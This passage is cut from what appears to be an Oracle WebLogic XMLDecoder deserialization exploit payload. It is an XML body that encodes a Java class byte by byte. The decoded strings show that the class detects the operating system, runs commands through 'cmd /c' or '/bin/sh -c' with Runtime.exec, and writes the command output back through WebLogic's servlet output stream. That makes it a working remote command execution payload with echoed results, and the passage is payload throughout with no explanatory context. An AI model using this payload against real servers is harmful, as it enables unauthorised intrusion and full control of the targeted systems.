index=\"2257\"><byte>116</byte></void><void index=\"2258\"><byte>114</byte></void><void index=\"2259\"><byte>105</byte></void><void index=\"2260\"><byte>110</byte></void><void index=\"2261\"><byte>103</byte></void><void index=\"2262\"><byte>66</byte></void><void index=\"2263\"><byte>117</byte></void><void index=\"2264\"><byte>102</byte></void><void index=\"2265\"><byte>102</byte></void><void index=\"2266\"><byte>101</byte></void><void index=\"2267\"><byte>114</byte></void><void index=\"2268\"><byte>7</byte></void><void index=\"2269\"><byte>0</byte></void><void index=\"2270\"><byte>80</byte></void><void index=\"2271\"><byte>10</byte></void><void index=\"2272\"><byte>0</byte></void><void index=\"2273\"><byte>81</byte></void><void index=\"2274\"><byte>0</byte></void><void index=\"2275\"><byte>34</byte></void><void index=\"2276\"><byte>1</byte></void><void index=\"2277\"><byte>0</byte></void><void index=\"2278\"><byte>6</byte></void><void index=\"2279\"><byte>97</byte></void><void index=\"2280\"><byte>112</byte></void><void index=\"2281\"><byte>112</byte></void><void index=\"2282\"><byte>101</byte></void><void index=\"2283\"><byte>110</byte></void><void index=\"2284\"><byte>100</byte></void><void index=\"2285\"><byte>1</byte></void><void index=\"2286\"><byte>0</byte></void><void index=\"2287\"><byte>44</byte></void><void index=\"2288\"><byte>40</byte></void><void index=\"2289\"><byte>76</byte></void><void index=\"2290\"><byte>106</byte></void><void index=\"2291\"><byte>97</byte></void><void index=\"2292\"><byte>118</byte></void><void index=\"2293\"><byte>97</byte></void><void index=\"2294\"><byte>47</byte></void><void index=\"2295\"><byte>108</byte></void><void index=\"2296\"><byte>97</byte></void><void index=\"2297\"><byte>110</byte></void><void index=\"2298\"><byte>103</byte></void><void index=\"2299\"><byte>47</byte></void><void index=\"2300\"><byte>83</byte></void><void index=\"2301\"><byte>116</byte></void><void index=\"2302\"><byte>114</byte></void><void index=\"2303\"><byte>105</byte></void><void index=\"2304\"><byte>110</byte></void><void index=\"2305\"><byte>103</byte></void><void index=\"2306\"><byte>59</byte></void><void index=\"2307\"><byte>41</byte></void><void index=\"2308\"><byte>76</byte></void><void index=\"2309\"><byte>106</byte></void><void index=\"2310\"><byte>97</byte></void><void index=\"2311\"><byte>118</byte></void><void index=\"2312\"><byte>97</byte></void><void index=\"2313\"><byte>47</byte></void><void index=\"2314\"><byte>108</byte></void><void index=\"2315\"><byte>97</byte></void><void index=\"2316\"><byte>110</byte></void><void index=\"2317\"><byte>103</byte></void><void index=\"2318\"><byte>47</byte></void><void index=\"2319\"><byte>83</byte></void><void index=\"2320\"><byte>116</byte></void><void index=\"2321\"><byte>114</byte></void><void index=\"2322\"><byte>105</byte></void><void index=\"2323\"><byte>110</byte></void><void index=\"2324\"><byte>103</byte></void><void index=\"2325\"><byte>66</byte></void><void index=\"2326\"><byte>117</byte></void><void index=\"2327\"><byte>102</byte></void><void index=\"2328\"><byte>102</byte></void><void index=\"2329\"><byte>101</byte></void><void index=\"2330\"><byte>114</byte></void><void index=\"2331\"><byte>59</byte></void><void index=\"2332\"><byte>12</byte></void><void index=\"2333\"><byte>0</byte></void><void index=\"2334\"><byte>83</byte></void><void index=\"2335\"><byte>0</byte></void><void index=\"2336\"><byte>84</byte></void><void index=\"2337\"><byte>10</byte></void><void index=\"2338\"><byte>0</byte></void><void index=\"2339\"><byte>81</byte></void><void index=\"2340\"><byte>0</byte></void><void index=\"2341\"><byte>85</byte></void><void index=\"2342\"><byte>1</byte></void><void index=\"2343\"><byte>0</byte></void><void index=\"2344\"><byte>5</byte></void><void index=\"2345\"><byte>32</byte></void><void index=\"2346\"><byte>58</byte></void><void index=\"2347\"><byte>32</byte></void><void index=\"2348\"><byte>13</byte></void><void index=\"2349\"><byte>10</byte></void><void index=\"2350\"><byte>8</byte></void><void index=\"2351\"><byte>0</byte></void><void index=\"2352\"><byte>87</byte></void><void index=\"2353\"><byte>1</byte></void><void index=\"2354\"><byte>0</byte></void><void index=\"2355\"><byte>8</byte></void><void index=\"2356\"><byte>116</byte></void><void index=\"2357\"><byte>111</byte></void><void index=\"2358\"><byte>83</byte></void><void index=\"2359\"><byte>116</byte></void><void index=\"2360\"><byte>114</byte></void><void index=\"2361\"><byte>105</byte></void><void index=\"2362\"><byte>110</byte></void><void index=\"2363\"><byte>103</byte></void><void index=\"2364\"><byte>1</byte></void><void index=\"2365\"><byte>0</byte></void><void index=\"2366\"><byte>20</byte></void><void index=\"2367\"><byte>40</byte></void><void index=\"2368\"><byte>41</byte></void><void index=\"2369\"><byte>76</byte></void><void index=\"2370\"><byte>106</byte></void><void index=\"2371\"><byte>97</byte></void><void index=\"2372\"><byte>118</byte></void><void index=\"2373\"><byte>97</byte></void><void index=\"2374\"><byte>47</byte></void><void index=\"2375\"><byte>108</byte></void><void index=\"2376\"><byte>97</byte></void><void index=\"2377\"><byte>110</byte></void><void index=\"2378\"><byte>103</byte></void><void index=\"2379\"><byte>47</byte></void><void index=\"2380\"><byte>83</byte></void><void index=\"2381\"><byte>116</byte></void><void index=\"2382\"><byte>114</byte></void><void index=\"2383\"><byte>105</byte></void><void index=\"2384\"><byte>110</byte></void><void index=\"2385\"><byte>103</byte></void><void index=\"2386\"><byte>59</byte></void><void index=\"2387\"><byte>12</byte></void><void index=\"2388\"><byte>0</byte></void><void index=\"2389\"><byte>89</byte></void><void index=\"2390\"><byte>0</byte></void><void index=\"2391\"><byte>90</byte></void><void index=\"2392\"><byte>10</byte></void><void index=\"2393\"><byte>0</byte></void><void index=\"2394\"><byte>81</byte></void><void index=\"2395\"><byte>0</byte></void><void index=\"2396\"><byte>91</byte></void><void index=\"2397\"><byte>12</byte></void><void index=\"2398\"><byte>0</byte></void><void index=\"2399\"><byte>10</byte></void><void index=\"2400\"><byte>0</byte></void><void index=\"2401\"><byte>71</byte></void><void index=\"2402\"><byte>10</byte></void><void index=\"2403\"><byte>0</byte></void><void index=\"2404\"><byte>79</byte></void><void index=\"2405\"><byte>0</byte></void><void index=\"2406\"><byte>93</byte></void><void index=\"2407\"><byte>1</byte></void><void index=\"2408\"><byte>0</byte></void><void index=\"2409\"><byte>49</byte></void><void index=\"2410\"><byte>119</byte></void><void index=\"2411\"><byte>101</byte></void><void index=\"2412\"><byte>98</byte></void><void index=\"2413\"><byte>108</byte></void><void index=\"2414\"><byte>111</byte></void><void index=\"2415\"><byte>103</byte></void><void index=\"2416\"><byte>105</byte></void><void index=\"2417\"><byte>99</byte></void><void index=\"2418\"><byte>47</byte></void><void index=\"2419\"><byte>115</byte></void><void index=\"2420\"><byte>101</byte></void><void index=\"2421\"><byte>114</byte></void><void index=\"2422\"><byte>118</byte></void><void index=\"2423\"><byte>108</byte></void><void index=\"2424\"><byte>101</byte></void><void index=\"2425\"><byte>116</byte></void><void index=\"2426\"><byte>47</byte></void><void index=\"2427\"><byte>105</byte></void><void index=\"2428\"><byte>110</byte></void><void index=\"2429\"><byte>116</byte></void><void index=\"2430\"><byte>101</byte></void><void index=\"2431\"><byte>114</byte></void><void index=\"2432\"><byte>110</byte></void><void index=\"2433\"><byte>97</byte></void><void index=\"2434\"><byte>108</byte></void><void index=\"2435\"><byte>47</byte></void><void index=\"2436\"><byte>83</byte></void><void index=\"2437\"><byte>101</byte></void><void index=\"2438\"><byte>114</byte></void><void index=\"2439\"><byte>118</byte></void><void index=\"2440\"><byte>108</byte></void><void index=\"2441\"><byte>101</byte></void><void index=\"2442\"><byte>116</byte></void><void index=\"2443\"><byte>79</byte></void><void index=\"2444\"><byte>117</byte></void><void index=\"2445\"><byte>116</byte></void><void index=\"2446\"><byte>112</byte></void><void index=\"2447\"><byte>117</byte></void><void index=\"2448\"><byte>116</byte></void><void index=\"2449\"><byte>83</byte></void><void index=\"2450\"><byte>116</byte></void><void index=\"2451\"><byte>114</byte></void><void index=\"2452\"><byte>101</byte></void><void index=\"2453\"><byte>97</byte></void><void index=\"2454\"><byte>109</byte></void><void index=\"2455\"><byte>73</byte></void><void index=\"2456\"><byte>109</byte></void><void index=\"2457\"><byte>112</byte></void><void index=\"2458\"><byte>108</byte></void><void index=\"2459\"><byte>7</byte></void><void index=\"2460\"><byte>0</byte></void><void index=\"2461\"><byte>95</byte></void><void index=\"2462\"><byte>1</byte></void><void index=\"2463\"><byte>0</byte></void><void index=\"2464\"><byte>11</byte></void><void index=\"2465\"><byte>119</byte></void><void index=\"2466\"><byte>114</byte></void><void index=\"2467\"><byte>105</byte></void><void index=\"2468\"><byte>116</byte></void><void index=\"2469\"><byte>101</byte></void><void index=\"2470\"><byte>83</byte></void><void index=\"2471\"><byte>116</byte></void><void index=\"2472\"><byte>114</byte></void><void index=\"2473\"><byte>101</byte></void><void index=\"2474\"><byte>97</byte></void><void index=\"2475\"><byte>109</byte></void><void index=\"2476\"><byte>1</byte></void><void index=\"2477\"><byte>0</byte></void><void index=\"2478\"><byte>24</byte></void><void index=\"2479\"><byte>40</byte></void><void index=\"2480\"><byte>76</byte></void><void index=\"2481\"><byte>106</byte></void><void index=\"2482\"><byte>97</byte></void><void index=\"2483\"><byte>118</byte></void><void index=\"2484\"><byte>97</byte></void><void index=\"2485\"><byte>47</byte></void><void index=\"2486\"><byte>105</byte></void><void index=\"2487\"><byte>111</byte></void><void index=\"2488\"><byte>47</byte></void><void index=\"2489\"><byte>73</byte></void><void index=\"2490\"><byte>110</byte></void><void index=\"2491\"><byte>112</byte></void><void index=\"2492\"><byte>117</byte></void><void index=\"2493\"><byte>116</byte></void><void index=\"2494\"><byte>83</byte></void><void index=\"2495\"><byte>116</byte></void><void index=\"2496\"><byte>114</byte></void><void index=\"2497\"><byte>101</byte></void><void index=\"2498\"><byte>97</byte></void><void index=\"2499\"><byte>109</byte></void><void index=\"2500\"><byte>59</byte></void><void index=\"2501\"><byte>41</byte></void><void index=\"2502\"><byte>86</byte></void><void index=\"2503\"><byte>12</byte></void><void index=\"2504\"><byte>0</byte></void><void index=\"2505\"><byte>97</byte></void><void index=\"2506\"><byte>0</byte></void><void index=\"2507\"><byte>98</byte></void><void index=\"2508\"><byte>10</byte></void><void index=\"2509\"><byte>0</byte></void><void index=\"2510\"><byte>96</byte></void><void index=\"2511\"><byte>0</byte></void><void index=\"2512\"><byte>99</byte></void><void index=\"2513\"><byte>1</byte></void><void index=\"2514\"><byte>0</byte></void><void index=\"2515\"><byte>5</byte></void><void index=\"2516\"><byte>102</byte></void><void index=\"2517\"><byte>108</byte></void><void index=\"2518\"><byte>117</byte></void><void index=\"2519\"><byte>115</byte></void><void index=\"2520\"><byte>104</byte></void><void index=\"2521\"><byte>12</byte></void><void index=\"2522\"><byte>0</byte></void><void index=\"2523\"><byte>101</byte></void><void index=\"2524\"><byte>0</byte></void><void index=\"2525\"><byte>11</byte></void><void index=\"2526\"><byte>10</byte></void><void index=\"2527\"><byte>0</byte></void><void index=\"2528\"><byte>96</byte></void><void index=\"2529\"><byte>0</byte></void><void index=\"2530\"><byte>102</byte></void><void index=\"2531\"><byte>1</byte></void><void index=\"2532\"><byte>0</byte></void><void index=\"2533\"><byte>7</byte></void><void index=\"2534\"><byte>111</byte></void><void index=\"2535\"><byte>115</byte></void><void index=\"2536\"><byte>46</byte></void><void index=\"2537\"><byte>110</byte></void><void index=\"2538\"><byte>97</byte></void><void index=\"2539\"><byte>109</byte></void><void index=\"2540\"><byte>101</byte></void><void index=\"2541\"><byte>8</byte></void><void index=\"2542\"><byte>0</byte></void><void index=\"2543\"><byte>104</byte></void><void index=\"2544\"><byte>1</byte></void><void index=\"2545\"><byte>0</byte></void><void index=\"2546\"><byte>16</byte></void><void index=\"2547\"><byte>106</byte></void><void index=\"2548\"><byte>97</byte></void><void index=\"2549\"><byte>118</byte></void><void index=\"2550\"><byte>97</byte></void><void index=\"2551\"><byte>47</byte></void><void index=\"2552\"><byte>108</byte></void><void index=\"2553\"><byte>97</byte></void><void index=\"2554\"><byte>110</byte></void><void index=\"2555\"><byte>103</byte></void><void index=\"2556\"><byte>47</byte></void><void index=\"2557\"><byte>83</byte></void><void index=\"2558\"><byte>121</byte></void><void index=\"2559\"><byte>115</byte></void><void index=\"2560\"><byte>116</byte></void><void index=\"2561\"><byte>101</byte></void><void index=\"2562\"><byte>109</byte></void><void index=\"2563\"><byte>7</byte></void><void index=\"2564\"><byte>0</byte></void><void index=\"2565\"><byte>106</byte></void><void index=\"2566\"><byte>1</byte></void><void index=\"2567\"><byte>0</byte></void><void index=\"2568\"><byte>11</byte></void><void index=\"2569\"><byte>103</byte></void><void index=\"2570\"><byte>101</byte></void><void index=\"2571\"><byte>116</byte></void><void index=\"2572\"><byte>80</byte></void><void index=\"2573\"><byte>114</byte></void><void index=\"2574\"><byte>111</byte></void><void index=\"2575\"><byte>112</byte></void><void index=\"2576\"><byte>101</byte></void><void index=\"2577\"><byte>114</byte></void><void index=\"2578\"><byte>116</byte></void><void index=\"2579\"><byte>121</byte></void><void index=\"2580\"><byte>12</byte></void><void index=\"2581\"><byte>0</byte></void><void index=\"2582\"><byte>108</byte></void><void index=\"2583\"><byte>0</byte></void><void index=\"2584\"><byte>59</byte></void><void index=\"2585\"><byte>10</byte></void><void index=\"2586\"><byte>0</byte></void><void index=\"2587\"><byte>107</byte></void><void index=\"2588\"><byte>0</byte></void><void index=\"2589\"><byte>109</byte></void><void index=\"2590\"><byte>1</byte></void><void index=\"2591\"><byte>0</byte></void><void index=\"2592\"><byte>16</byte></void><void index=\"2593\"><byte>106</byte></void><void index=\"2594\"><byte>97</byte></void><void index=\"2595\"><byte>118</byte></void><void index=\"2596\"><byte>97</byte></void><void index=\"2597\"><byte>47</byte></void><void index=\"2598\"><byte>108</byte></void><void index=\"2599\"><byte>97</byte></void><void index=\"2600\"><byte>110</byte></void><void index=\"2601\"><byte>103</byte></void><void index=\"2602\"><byte>47</byte></void><void index=\"2603\"><byte>83</byte></void><void index=\"2604\"><byte>116</byte></void><void index=\"2605\"><byte>114</byte></void><void index=\"2606\"><byte>105</byte></void><void index=\"2607\"><byte>110</byte></void><void index=\"2608\"><byte>103</byte></void><void index=\"2609\"><byte>7</byte></void><void index=\"2610\"><byte>0</byte></void><void index=\"2611\"><byte>111</byte></void><void index=\"2612\"><byte>1</byte></void><void index=\"2613\"><byte>0</byte></void><void index=\"2614\"><byte>11</byte></void><void index=\"2615\"><byte>116</byte></void><void index=\"2616\"><byte>111</byte></void><void index=\"2617\"><byte>76</byte></void><void index=\"2618\"><byte>111</byte></void><void index=\"2619\"><byte>119</byte></void><void index=\"2620\"><byte>101</byte></void><void index=\"2621\"><byte>114</byte></void><void index=\"2622\"><byte>67</byte></void><void index=\"2623\"><byte>97</byte></void><void index=\"2624\"><byte>115</byte></void><void index=\"2625\"><byte>101</byte></void><void index=\"2626\"><byte>12</byte></void><void index=\"2627\"><byte>0</byte></void><void index=\"2628\"><byte>113</byte></void><void index=\"2629\"><byte>0</byte></void><void index=\"2630\"><byte>90</byte></void><void index=\"2631\"><byte>10</byte></void><void index=\"2632\"><byte>0</byte></void><void index=\"2633\"><byte>112</byte></void><void index=\"2634\"><byte>0</byte></void><void index=\"2635\"><byte>114</byte></void><void index=\"2636\"><byte>1</byte></void><void index=\"2637\"><byte>0</byte></void><void index=\"2638\"><byte>3</byte></void><void index=\"2639\"><byte>119</byte></void><void index=\"2640\"><byte>105</byte></void><void index=\"2641\"><byte>110</byte></void><void index=\"2642\"><byte>8</byte></void><void index=\"2643\"><byte>0</byte></void><void index=\"2644\"><byte>116</byte></void><void index=\"2645\"><byte>1</byte></void><void index=\"2646\"><byte>0</byte></void><void index=\"2647\"><byte>8</byte></void><void index=\"2648\"><byte>99</byte></void><void index=\"2649\"><byte>111</byte></void><void index=\"2650\"><byte>110</byte></void><void index=\"2651\"><byte>116</byte></void><void index=\"2652\"><byte>97</byte></void><void index=\"2653\"><byte>105</byte></void><void index=\"2654\"><byte>110</byte></void><void index=\"2655\"><byte>115</byte></void><void index=\"2656\"><byte>1</byte></void><void index=\"2657\"><byte>0</byte></void><void index=\"2658\"><byte>27</byte></void><void index=\"2659\"><byte>40</byte></void><void index=\"2660\"><byte>76</byte></void><void index=\"2661\"><byte>106</byte></void><void index=\"2662\"><byte>97</byte></void><void index=\"2663\"><byte>118</byte></void><void index=\"2664\"><byte>97</byte></void><void index=\"2665\"><byte>47</byte></void><void index=\"2666\"><byte>108</byte></void><void index=\"2667\"><byte>97</byte></void><void index=\"2668\"><byte>110</byte></void><void index=\"2669\"><byte>103</byte></void><void index=\"2670\"><byte>47</byte></void><void index=\"2671\"><byte>67</byte></void><void index=\"2672\"><byte>104</byte></void><void index=\"2673\"><byte>97</byte></void><void index=\"2674\"><byte>114</byte></void><void index=\"2675\"><byte>83</byte></void><void index=\"2676\"><byte>101</byte></void><void index=\"2677\"><byte>113</byte></void><void index=\"2678\"><byte>117</byte></void><void index=\"2679\"><byte>101</byte></void><void index=\"2680\"><byte>110</byte></void><void index=\"2681\"><byte>99</byte></void><void index=\"2682\"><byte>101</byte></void><void index=\"2683\"><byte>59</byte></void><void index=\"2684\"><byte>41</byte></void><void index=\"2685\"><byte>90</byte></void><void index=\"2686\"><byte>12</byte></void><void index=\"2687\"><byte>0</byte></void><void index=\"2688\"><byte>118</byte></void><void index=\"2689\"><byte>0</byte></void><void index=\"2690\"><byte>119</byte></void><void index=\"2691\"><byte>10</byte></void><void index=\"2692\"><byte>0</byte></void><void index=\"2693\"><byte>112</byte></void><void index=\"2694\"><byte>0</byte></void><void index=\"2695\"><byte>120</byte></void><void index=\"2696\"><byte>1</byte></void><void index=\"2697\"><byte>0</byte></void><void index=\"2698\"><byte>17</byte></void><void index=\"2699\"><byte>106</byte></void><void index=\"2700\"><byte>97</byte></void><void index=\"2701\"><byte>118</byte></void><void index=\"2702\"><byte>97</byte></void><void index=\"2703\"><byte>47</byte></void><void index=\"2704\"><byte>108</byte></void><void index=\"2705\"><byte>97</byte></void><void index=\"2706\"><byte>110</byte></void><void index=\"2707\"><byte>103</byte></void><void index=\"2708\"><byte>47</byte></void><void index=\"2709\"><byte>82</byte></void><void index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>110</byte></void><void index=\"2712\"><byte>116</byte></void><void index=\"2713\"><byte>105</byte></void><void index=\"2714\"><byte>109</byte></void><void index=\"2715\"><byte>101</byte></void><void index=\"2716\"><byte>7</byte></void><void index=\"2717\"><byte>0</byte></void><void index=\"2718\"><byte>122</byte></void><void index=\"2719\"><byte>1</byte></void><void index=\"2720\"><byte>0</byte></void><void index=\"2721\"><byte>10</byte></void><void index=\"2722\"><byte>103</byte></void><void index=\"2723\"><byte>101</byte></void><void index=\"2724\"><byte>116</byte></void><void index=\"2725\"><byte>82</byte></void><void index=\"2726\"><byte>117</byte></void><void index=\"2727\"><byte>110</byte></void><void index=\"2728\"><byte>116</byte></void><void index=\"2729\"><byte>105</byte></void><void index=\"2730\"><byte>109</byte></void><void index=\"2731\"><byte>101</byte></void><void index=\"2732\"><byte>1</byte></void><void index=\"2733\"><byte>0</byte></void><void index=\"2734\"><byte>21</byte></void><void index=\"2735\"><byte>40</byte></void><void index=\"2736\"><byte>41</byte></void><void index=\"2737\"><byte>76</byte></void><void index=\"2738\"><byte>106</byte></void><void index=\"2739\"><byte>97</byte></void><void index=\"2740\"><byte>118</byte></void><void index=\"2741\"><byte>97</byte></void><void index=\"2742\"><byte>47</byte></void><void index=\"2743\"><byte>108</byte></void><void index=\"2744\"><byte>97</byte></void><void index=\"2745\"><byte>110</byte></void><void index=\"2746\"><byte>103</byte></void><void index=\"2747\"><byte>47</byte></void><void index=\"2748\"><byte>82</byte></void><void index=\"2749\"><byte>117</byte></void><void index=\"2750\"><byte>110</byte></void><void index=\"2751\"><byte>116</byte></void><void index=\"2752\"><byte>105</byte></void><void index=\"2753\"><byte>109</byte></void><void index=\"2754\"><byte>101</byte></void><void index=\"2755\"><byte>59</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>0</byte></void><void index=\"2758\"><byte>124</byte></void><void index=\"2759\"><byte>0</byte></void><void index=\"2760\"><byte>125</byte></void><void index=\"2761\"><byte>10</byte></void><void index=\"2762\"><byte>0</byte></void><void index=\"2763\"><byte>123</byte></void><void index=\"2764\"><byte>0</byte></void><void index=\"2765\"><byte>126</byte></void><void index=\"2766\"><byte>1</byte></void><void index=\"2767\"><byte>0</byte></void><void index=\"2768\"><byte>7</byte></void><void index=\"2769\"><byte>99</byte></void><void index=\"2770\"><byte>109</byte></void><void index=\"2771\"><byte>100</byte></void><void index=\"2772\"><byte>32</byte></void><void index=\"2773\"><byte>47</byte></void><void index=\"2774\"><byte>99</byte></void><void index=\"2775\"><byte>32</byte></void><void index=\"2776\"><byte>8</byte></void><void index=\"2777\"><byte>0</byte></void><void index=\"2778\"><byte>-128</byte></void><void index=\"2779\"><byte>1</byte></void><void index=\"2780\"><byte>0</byte></void><void index=\"2781\"><byte>4</byte></void><void index=\"2782\"><byte>101</byte></void><void index=\"2783\"><byte>120</byte></void><void index=\"2784\"><byte>101</byte></void><void index=\"2785\"><byte>99</byte></void><void index=\"2786\"><byte>1</byte></void><void index=\"2787\"><byte>0</byte></void><void index=\"2788\"><byte>39</byte></void><void index=\"2789\"><byte>40</byte></void><void index=\"2790\"><byte>76</byte></void><void index=\"2791\"><byte>106</byte></void><void index=\"2792\"><byte>97</byte></void><void index=\"2793\"><byte>118</byte></void><void index=\"2794\"><byte>97</byte></void><void index=\"2795\"><byte>47</byte></void><void index=\"2796\"><byte>108</byte></void><void index=\"2797\"><byte>97</byte></void><void index=\"2798\"><byte>110</byte></void><void index=\"2799\"><byte>103</byte></void><void index=\"2800\"><byte>47</byte></void><void index=\"2801\"><byte>83</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>114</byte></void><void index=\"2804\"><byte>105</byte></void><void index=\"2805\"><byte>110</byte></void><void index=\"2806\"><byte>103</byte></void><void index=\"2807\"><byte>59</byte></void><void index=\"2808\"><byte>41</byte></void><void index=\"2809\"><byte>76</byte></void><void index=\"2810\"><byte>106</byte></void><void index=\"2811\"><byte>97</byte></void><void index=\"2812\"><byte>118</byte></void><void index=\"2813\"><byte>97</byte></void><void index=\"2814\"><byte>47</byte></void><void index=\"2815\"><byte>108</byte></void><void index=\"2816\"><byte>97</byte></void><void index=\"2817\"><byte>110</byte></void><void index=\"2818\"><byte>103</byte></void><void index=\"2819\"><byte>47</byte></void><void index=\"2820\"><byte>80</byte></void><void index=\"2821\"><byte>114</byte></void><void index=\"2822\"><byte>111</byte></void><void index=\"2823\"><byte>99</byte></void><void index=\"2824\"><byte>101</byte></void><void index=\"2825\"><byte>115</byte></void><void index=\"2826\"><byte>115</byte></void><void index=\"2827\"><byte>59</byte></void><void index=\"2828\"><byte>12</byte></void><void index=\"2829\"><byte>0</byte></void><void index=\"2830\"><byte>-126</byte></void><void index=\"2831\"><byte>0</byte></void><void index=\"2832\"><byte>-125</byte></void><void index=\"2833\"><byte>10</byte></void><void index=\"2834\"><byte>0</byte></void><void index=\"2835\"><byte>123</byte></void><void index=\"2836\"><byte>0</byte></void><void index=\"2837\"><byte>-124</byte></void><void index=\"2838\"><byte>1</byte></void><void index=\"2839\"><byte>0</byte></void><void index=\"2840\"><byte>11</byte></void><void index=\"2841\"><byte>47</byte></void><void index=\"2842\"><byte>98</byte></void><void index=\"2843\"><byte>105</byte></void><void index=\"2844\"><byte>110</byte></void><void index=\"2845\"><byte>47</byte></void><void index=\"2846\"><byte>115</byte></void><void index=\"2847\"><byte>104</byte></void><void index=\"2848\"><byte>32</byte></void><void index=\"2849\"><byte>45</byte></void><void index=\"2850\"><byte>99</byte></void><void index=\"2851\"><byte>32</byte></void><void index=\"2852\"><byte>8</byte></void><void index=\"2853\"><byte>0</byte></void><void index=\"2854\"><byte>-122</byte></void><void index=\"2855\"><byte>1</byte></void><void index=\"2856\"><byte>0</byte></void><void index=\"2857\"><byte>22</byte></void><void index=\"2858\"><byte>106</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>118</byte></void><void index=\"2861\"><byte>97</byte></void><void index=\"2862\"><byte>47</byte></void><void index=\"2863\"><byte>105</byte></void><void index=\"2864\"><byte>111</byte></void><void index=\"2865\"><byte>47</byte></void><void index=\"2866\"><byte>66</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>102</byte></void><void index=\"2869\"><byte>102</byte></void><void index=\"2870\"><byte>101</byte></void><void index=\"2871\"><byte>114</byte></void><void index=\"2872\"><byte>101</byte></void><void index=\"2873\"><byte>100</byte></void><void index=\"2874\"><byte>82</byte></void><void index=\"2875\"><byte>101</byte></void><void index=\"2876\"><byte>97</byte></void><void index=\"2877\"><byte>100</byte></void><void index=\"2878\"><byte>101</byte></void><void index=\"2879\"><byte>114</byte></void><void index=\"2880\"><byte>7</byte></void><void index=\"2881\"><byte>0</byte></void><void index=\"2882\"><byte>-120</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>25</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>105</byte></void><void index=\"2892\"><byte>111</byte></void><void index=\"2893\"><byte>47</byte></void><void index=\"2894\"><byte>73</byte></void><void index=\"2895\"><byte>110</byte></void><void index=\"2896\"><byte>112</byte></void><void index=\"2897\"><byte>117</byte></void><void index=\"2898\"><byte>116</byte></void><void index=\"2899\"><byte>83</byte></void><void index=\"2900\"><byte>116</byte></void><void index=\"2901\"><byte>114</byte></void><void index=\"2902\"><byte>101</byte></void><void index=\"2903\"><byte>97</byte></void><void index=\"2904\"><byte>109</byte></void><void index=\"2905\"><byte>82</byte></void><void index=\"2906\"><byte>101</byte></void><void index=\"2907\"><byte>97</byte></void><void index=\"2908\"><byte>100</byte></void><void index=\"2909\"><byte>101</byte></void><void index=\"2910\"><byte>114</byte></void><void index=\"2911\"><byte>7</byte></void><void index=\"2912\"><byte>0</byte></void><void index=\"2913\"><byte>-118</byte></void><void index=\"2914\"><byte>1</byte></void><void index=\"2915\"><byte>0</byte></void><void index=\"2916\"><byte>17</byte></void><void index=\"2917\"><byte>106</byte></void><void index=\"2918\"><byte>97</byte></void><void index=\"2919\"><byte>118</byte></void><void index=\"2920\"><byte>97</byte></void><void index=\"2921\"><byte>47</byte></void><void index=\"2922\"><byte>108</byte></void><void index=\"2923\"><byte>97</byte></void><void index=\"2924\"><byte>110</byte></void><void index=\"2925\"><byte>103</byte></void><void index=\"2926\"><byte>47</byte></void><void index=\"2927\"><byte>80</byte></void><void index=\"2928\"><byte>114</byte></void><void index=\"2929\"><byte>111</byte></void><void index=\"2930\"><byte>99</byte></void><void index=\"2931\"><byte>101</byte></void><void index=\"2932\"><byte>115</byte></void><void index=\"2933\"><byte>115</byte></void><void index=\"2934\"><byte>7</byte></void><void index=\"2935\"><byte>0</byte></void><void index=\"2936\"><byte>-116</byte></void><void index=\"2937\"><byte>1</byte></void><void index=\"2938\"><byte>0</byte></void><void index=\"2939\"><byte>14</byte></void><void index=\"2940\"><byte>103</byte></void><void index=\"2941\"><byte>101</byte></void><void index=\"2942\"><byte>116</byte></void><void index=\"2943\"><byte>73</byte></void><void index=\"2944\"><byte>110</byte></void><void index=\"2945\"><byte>112</byte></void><void index=\"2946\"><byte>117</byte></void><void index=\"2947\"><byte>116</byte></void><void index=\"2948\"><byte>83</byte></void><void index=\"2949\"><byte>116</byte></void><void index=\"2950\"><byte>114</byte></void><void index=\"2951\"><byte>101</byte></void><void index=\"2952\"><byte>97</byte></void><void index=\"2953\"><byte>109</byte></void><void index=\"2954\"><byte>1</byte></void><void index=\"2955\"><byte>0</byte></void><void index=\"2956\"><byte>23</byte></void><void index=\"2957\"><byte>40</byte></void><void index=\"2958\"><byte>41</byte></void><void index=\"2959\"><byte>76</byte></void><void index=\"2960\"><byte>106</byte></void><void index=\"2961\"><byte>97</byte></void><void index=\"2962\"><byte>118</byte></void><void index=\"2963\"><byte>97</byte></void><void index=\"2964\"><byte>47</byte></void><void index=\"2965\"><byte>105</byte></void><void index=\"2966\"><byte>111</byte></void><void index=\"2967\"><byte>47</byte></void><void index=\"2968\"><byte>73</byte></void><void index=\"2969\"><byte>110</byte></void><void index=\"2970\"><byte>112</byte></void><void index=\"2971\"><byte>117</byte></void><void index=\"2972\"><byte>116</byte></void><void index=\"2973\"><byte>83</byte></void><void index=\"2974\"><byte>116</byte></void><void index=\"2975\"><byte>114</byte></void><void index=\"2976\"><byte>101</byte></void><void index=\"2977\"><byte>97</byte></void><void index=\"2978\"><byte>109</byte></void><void index=\"2979\"><byte>59</byte></void><void index=\"2980\"><byte>12</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>-114</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>-113</byte></void><void index=\"2985\"><byte>10</byte></void><void index=\"2986\"><byte>0</byte></void><void index=\"2987\"><byte>-115</byte></void><void index=\"2988\"><byte>0</byte></void><void index=\"2989\"><byte>-112</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>42</byte></void><void index=\"2993\"><byte>40</byte></void><void index=\"2994\"><byte>76</byte></void><void index=\"2995\"><byte>106</byte></void><void index=\"2996\"><byte>97</byte></void><void index=\"2997\"><byte>118</byte></void><void index=\"2998\"><byte>97</byte></void><void index=\"2999\"><byte>47</byte></void><void index=\"3000\"><byte>105</byte></void><void index=\"3001\"><byte>111</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>73</byte></void><void index=\"3004\"><byte>110</byte></void><void index=\"3005\"><byte>112</byte></void><void 